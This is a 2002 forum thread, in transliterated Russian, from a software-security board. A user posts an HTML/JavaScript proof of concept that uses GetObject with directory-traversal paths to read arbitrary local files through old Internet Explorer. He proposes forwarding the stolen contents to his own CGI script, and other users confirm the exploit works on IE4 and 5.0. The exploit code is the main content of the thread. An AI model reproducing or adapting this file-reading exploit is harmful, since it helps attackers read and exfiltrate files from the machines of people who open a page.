AKB Forums

Go Back   AKB Forums > Technical sections > Software Security
Home Register Blogs FAQ Members List Calendar Downloads Arcade Mark Forums Read

Software Security Discussing software security algorithms, tricks, vulnerabilities

Troubles when posting message? Click here! :: Проблемы с отправлением сообщения? Нажмите сюда!

Reply
 
LinkBack Thread Tools Display Modes
Old Feb 13, 2002, 04:17   #1
Консервативный Демагог
 
VX's Avatar
 
Join Date: Jan 2002
Location: Кавказская Албания
Posts: 889
Rep Power: 7
Reputation: 10
Post IE Can Read any file

Neznau kakya u vas budet reakciya. no ya "kipyatkom pisal"
<blockquote><font size="1" face="MS Sans Serif, Verdana, Helvetica, sans-serif">code:</font><hr><pre>
<HTML>
<HEAD>
<META NAME="GENERATOR" Content="Thor Larholm">
<TITLE>GetObject local file reading</TITLE>
</HEAD>
<BODY onl oad= &quote; KickIt()&quote;>

<P>Here you go, your
C:\<input type=text style="border:1px solid;width:300px" value="WINNT\WIN.INI" onc hange=&quoteKickIt()&quote id=whichFile tabindex=1> file
<input type=button oncl ick ="KickIt()" style="border:1px solid black" value="Read file">
</P>

<xmp id=Stuff tabindex=-1>

</xmp>

<script>
function KickIt(){
var S = "http://"+location.host+"/../../../../../../../../../../../../../../../../"
S += whichFile.value.replace(/\\/g,"/")
A=GetObject(S,"htmlfile")
setTimeout("PutFile()",200)
}
function PutFile(){
var sContent = A.body.innerText
Stuff.innerText = sContent.length>0 ? sContent : "File not found"
whichFile.focus()
}

</script>


</BODY>
</HTML>
</pre><hr></blockquote>

Da dumau cto eto vse delo mojno otpravlyat' svoei cgi programme <img src="smooch-1.gif" border="0">
Jdu vashix predlojenii
__________________
Праздник к нам приходит...

|^^^^^^^^^'''^\| ||\__
| ВОДКА-ВОДКА | ||','''|'''''''\_____,_
| _..... _ | ||_ _|'__|_____||.........| |
'(@)'(@)'(@)''''''''''''''''''''''*|(@)""""|(@)*
VX is offline   Reply With Quote Quote selected
Old Feb 14, 2002, 18:30   #2
Administrator
 
greka's Avatar
 
Join Date: Sep 2001
Location: @work
Posts: 5,347
Rep Power: 10
Reputation: 23
Send a message via ICQ to greka
Question

etot kod ne rabotaet - parsing errory i t.p.

ty sam proboval ego zapuskat'?
__________________
И повешенные могут качаться в неположенную сторону. /С.Е.Лец/
greka is offline   Reply With Quote Quote selected
Old Feb 14, 2002, 19:47   #3
Консервативный Демагог
 
VX's Avatar
 
Join Date: Jan 2002
Location: Кавказская Албания
Posts: 889
Rep Power: 7
Reputation: 10
Post

Mr, kajetsa ya vam doljen koe cto obyasnit'

Kak moderator etoy chasti foruma ya OBYAZAN
posliatsa soobsheniya kotorie sototvestvuut istine.
NO, koda ya pisal etot code v ubb on postoyanno ne razrishal mne post delat', ssilayas (u can't use onload tag..), vot pochemy v handlerax javaScripta mne prishlos' postavit' probeli.tak cto vas bNOPIYA bil tut naprasnim.

uDACHI
__________________
Праздник к нам приходит...

|^^^^^^^^^'''^\| ||\__
| ВОДКА-ВОДКА | ||','''|'''''''\_____,_
| _..... _ | ||_ _|'__|_____||.........| |
'(@)'(@)'(@)''''''''''''''''''''''*|(@)""""|(@)*
VX is offline   Reply With Quote Quote selected
Old Feb 15, 2002, 15:02   #4
Administrator
 
greka's Avatar
 
Join Date: Sep 2001
Location: @work
Posts: 5,347
Rep Power: 10
Reputation: 23
Send a message via ICQ to greka
Smile

spasibo za pojasnenie, Sir,
ja poprobuju pokopat'sja v kode - interesno. <img src="smooch-1.gif" border="0">
__________________
И повешенные могут качаться в неположенную сторону. /С.Е.Лец/
greka is offline   Reply With Quote Quote selected
Old Feb 17, 2002, 00:45   #5
»
 
z0mbie's Avatar
 
Join Date: Jan 2002
Posts: 776
Rep Power: 7
Reputation: 10
Send a message via ICQ to z0mbie
Post

(!)
eto na vsex versiyax rabotaet ? [proveryal na IE4,rabotaet]
z0mbie is offline   Reply With Quote Quote selected
Old Feb 17, 2002, 04:57   #6
Консервативный Демагог
 
VX's Avatar
 
Join Date: Jan 2002
Location: Кавказская Албания
Posts: 889
Rep Power: 7
Reputation: 10
Post

Na 5.0 toje
__________________
Праздник к нам приходит...

|^^^^^^^^^'''^\| ||\__
| ВОДКА-ВОДКА | ||','''|'''''''\_____,_
| _..... _ | ||_ _|'__|_____||.........| |
'(@)'(@)'(@)''''''''''''''''''''''*|(@)""""|(@)*
VX is offline   Reply With Quote Quote selected
Reply


Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On



All times are GMT. The time now is 16:01.


Powered by vBulletin® Version 3.6.8
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
This board was founded on September 29, 2001
Powered by Viper Internet

Affordable Web Hosting | ParevNet

Buy text link